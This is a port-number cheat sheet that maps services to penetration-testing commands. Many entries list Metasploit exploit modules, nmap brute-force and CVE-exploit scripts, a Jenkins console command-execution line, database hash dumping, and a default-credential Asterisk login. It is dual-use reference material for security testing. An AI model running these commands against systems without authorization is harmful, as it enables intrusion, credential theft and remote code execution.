ports_number.md

Authors: < nixawk >

---

Ports

Port Number	Protocol	Service & Application	Commands
1	tcp	blackice
7	tcp	echo
11	tcp	systat
13	tcp	daytime
15	tcp	netstat
17	tcp	quote of the day
19	tcp	character generator
21	tcp	ftp
22	tcp	ssh	msf > use auxiliary/scanner/ssh/ssh_login nmap --script ssh2-enum-algos 192.168.108.197 nmap --script ssh-hostkey 192.168.108.197 nmap --script sshv1 192.168.108.197
23	tcp	telnet	msf > use auxiliary/scanner/telnet/telnet_login nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s target nmap -p 23 --script telnet-encryption target nmap -p 23 --script telnet-ntlm-info target
25	tcp	smtp	nmap -p 25 --script smtp-brute target nmap --script smtp-commands.nse [--script-args smtp-commands.domain=domain] -pT:25,465,587 target nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com target nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=domain,smtp-open-relay.ip=address,...] -p 25,465,587 target nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 target nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 target nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=domain' -pT:25,465,587 target nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 target
26	tcp	ssh
37	tcp	rdate
49	tcp	TACACS+
53	tcp	dns
53	udp	dns
67	tcp	DHCP
68	tcp	dhclient
69	udp	TFTP,BitTorrent
70	tcp	Gopher
79	tcp	Finger
80	tcp	HTTP,malware
81	tcp	HTTP,malware
82	tcp	HTTP,malware
83	tcp	HTTP
84	tcp	HTTP
88	tcp	Kerberos	use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
102	tcp	Siemens S7
110	tcp	pop3
111	tcp	RPC	rpcinfo -p 192.168.1.111 msf >use auxiliary/scanner/nfs/nfsmount
119	tcp	NNTP
123	tcp	NTP
123	udp	ntp	ntpdc -n -c monlist target nmap -sU -p 123 -Pn -n --script ntp-info target nmap -sU -p 123 -Pn -n --script ntp-monlist target msf > use auxiliary/scanner/ntp/ntp_readvar
137	tcp	NetBIOS	nbtscan -A target
143	tcp	IMAP
161	udp	snmp	snmpcheck -p 161 -c public -t target snmpwalk -v1 -c public target msf > use auxiliary/scanner/snmp/snmp_enum
175	tcp	IBM Network Job Entry
179	tcp	BGP
195	tcp	TA14-353a
311	tcp	OS X Server Manager
389	tcp	ldap	ldap://target/dc=com
443	tcp	https	openssl s_client -host www.yahoo.com -port 443 sslscan www.yahoo.com tlssled www.yahoo.com 443 nmap --script sslv2 www.yahoo.com nmap --script ssl-cert www.yahoo.com nmap --script ssl-date www.yahoo.com nmap --script ssl-enum-ciphers www.yahoo.com nmap --script ssl-google-cert-catalog www.yahoo.com msf > use auxiliary/pro/web_ssl_scan msf > use auxiliary/scanner/ssl/openssl_heartbleed msf > use auxiliary/server/openssl_heartbeat_client_memory
445	tcp	Microsoft-DS Active Directory, Windows shares Microsoft-DS SMB file sharing	smbclient -U root -L target smbclient -U root //target/tmp rpcclient -U "" target msf > auxiliary/admin/smb/samba_symlink_traversal
465	tcp	smtps
500	udp	ike
502	tcp	modbus
503	tcp	modbus
512	tcp
513	tcp
514	tcp
515	tcp	Line Printer Daemon
520	tcp	RIP
523	tcp	IBM DB2
554	tcp	RTSP
587	tcp	SMTP mail submission
623	tcp	IPMI
626	tcp	OS X serialnumbered
631	tcp	CUPS Service error
636	tcp	ldaps
771	tcp	Realport
789	tcp	Redlion Crimson3
873	tcp	rsync	rsync -a user@host::tools/ nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' target nmap -p 873 --script rsync-list-modules target msf >use auxiliary/scanner/rsync/modules_list
902	tcp	VMware authentication
992	tcp	Telnet(secure)
993	tcp	IMAPs
995	tcp	POP3s
1023	tcp	telnet
1025	tcp	Kamstrup
1099	tcp	Remote Method invocation	use exploit/multi/misc/java_rmi_server
1194	tcp	openvpn
1200	tcp	Codesys
1234	udp	udpxy
1202	tcp	linknat
1434	udp	MS-SQL monitor
1604		Citrix, malware
1723	tcp	pptp	thc-pptp-bruter -v -u username -n 4 target < pass.txt
1741		CiscoWorks
1833		MQTT
1900	tcp	bes,UPnP
1911		Niagara Fox
1962		PCworx
2000		iKettle,MikroTik bandwidth test
2049	tcp	nfs	showmount --all target showmount --exports target mount -t nfs target:/ /mnt/nfs/
2121	tcp	ftp	msf > use auxiliary/scanner/ftp/ftp_login
2082	tcp	cpanel
2083	tcp	cpanel
2086		WHM
2087		WHM
2123		GTPv1
2152		GTPv1
2182		Apache Zookeeper
2222	tcp	SSH, PLC5, EtherNet/IP
2323	tcp	telnet
2332	tcp	Sierra wireless(telnet)
2375		Docker
2376		Docker
2404		IEC-104
2455		CoDeSys
2480		OrientDB
2628		Dictionary
3000		ntop
3128	tcp	squid
3299	tcp	sap	msf > use auxiliary/scanner/sap/sap_router_portscanner
3306	tcp	mysql	msf > auxiliary/scanner/mysql/mysql_login nmap --script mysql-brute target nmap --script mysql-databases target nmap -p 3306 --script mysql-dump-hashes target --script-args='username=username,password=password' target nmap -p 3306 --script mysql-enum target nmap -p 3306 --script mysql-users target nmap -p 3306 --script mysql-query --script-args='query="query"[,username=username,password=password] target'
3310	tcp	ClamAV
3386		GTPv1
3388		RDP
3389		RDP
3541		PBX GUI
3542		PBX GUI
3632	tcp	distccd	msf > use exploit/unix/misc/distcc_exec
3689		DACP
3780		Metasploit
3787		Ventrilo
4022		udpxy
4369	tcp	Erlang Port Mapper Daemon	nmap -p 4369 --script epmd-info target
4440	tcp	rundeck
4500		IKE NAT-T(VPN)
4567		Modem web interface
4070		VertX/Edge door controller
4800		Noxa Nport
4911		Niagara Fox with SSL
4949		Munin
5006		MELSEC-Q
5007		MELSEC-Q
5008		NetMobility
5009		Apple Aitport Administrator
5038	tcp	Asterisk Call Manager	http://code.google.com/p/sipvicious/ $ ncat -v 192.168.108.196 5038 Ncat: Version 6.47 ( http://nmap.org/ncat ) Ncat: Connected to 192.168.108.196:5038. Asterisk Call Manager/1.1 action: login username: admin secret: amp111 Response: Success Message: Authentication accepted action: command command: core show help
5432	tcp	postgresql
5060	udp	sip	msf > use auxiliary/scanner/sip/options
5222		XMPP
5269		XMPP Server to Server
5353		mDNS
5357		Mirosoft-HTTP API/2.0
5432		Postgresql
5555	tcp	hp data protector	msf > use exploit/windows/misc/hp_dataprotector_cmd_exec
5577		Flux LED
5601	tcp	kibana
5632		PCAnywhere
5672		RabbitMQ
5900	tcp	vnc	msf > use auxiliary/scanner/vnc/vnc_none_auth msf > use auxiliary/scanner/vnc/vnc_login msf > use exploit/multi/vnc/vnc_keyboard_exec nmap --script vnc-brute -p 5900 nmap --script vnc-info -p 5900
5901		vnc
5938		TeamViewer
5984		CouchDB
5985	tcp	winrm	msf >use exploit/windows/winrm/winrm_script_exec msf >use auxiliary/scanner/winrm/winrm_auth_methods msf >use auxiliary/scanner/winrm/winrm_cmd msf >use auxiliary/scanner/winrm/winrm_login msf >use auxiliary/scanner/winrm/winrm_wql
6000	tcp	x11	xwd -root -screen -slient -display 192.168.1.108:0 > out.xwd convert out.xwd out.png
6379	tcp	redis	redis-cli -h 127.0.0.1 -p 6379 msf >use auxiliary/scanner/redis/file_upload msf >use auxiliary/scanner/redis/redis_login use auxiliary/scanner/redis/redis_server
6380	tcp	redis
6082	tcp	varnish
6667	tcp	ircd backdoor	msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
6881		BitTorrent
6969		TFTP,BitTorrent
7001	tcp	weblogic
8080	tcp	jekins	Jekins Console println "cmd.exe /c dir".execute().text msf >use auxiliary/scanner/http/jenkins_enum msf >use exploit/multi/http/jenkins_script_console
8083	tcp	vestacp
8089	tcp	jboss
8101	tcp	apache karaf
8180	tcp	apache tomcat	msf > use exploit/multi/http/tomcat_mgr_deploy
8443	tcp	https
8554	tcp	rtsp
8649	tcp	ganglia
9009	tcp	Julia
9151	tcp	Tor Control
9160		Apache Cassandra
9200	tcp	elasticsearch	msf >use exploit/multi/elasticsearch/search_groovy_script
9418	tcp	git
10000	tcp	virtualmin/webmin
11211	tcp	memcache	msf > use auxiliary/gather/memcached_extractor $ nc x.x.x.x 11211 stats\r\n
13579		Media Player classic web interface
15672	tcp	rabbitmq	http login - guest/guest
17185		VxWorks WDBRPC
18083	tcp	vbox server
27017	tcp	mongodb	msf >use auxiliary/scanner/mongodb/mongodb_login $ mongo host:port/database MongoDB shell version: 2.6.12 > help
28017	tcp	mongodb
37777		Dahua DVR
44818		EtherNet/IP
49153		WeMo Link
50000	tcp	sap
50030	tcp	hadoop
50070	tcp	hadoop
51106		Deluge(HTTP)
54138		Toshiba PoS
55553		Metasploit
55554		Metasploit
62078		Apple iDevice
64738		Mumble

Links

1. http://www.rfc-editor.org/search/rfc_search.php
2. http://packetlife.net/
3. https://www.leanpub.com/shodan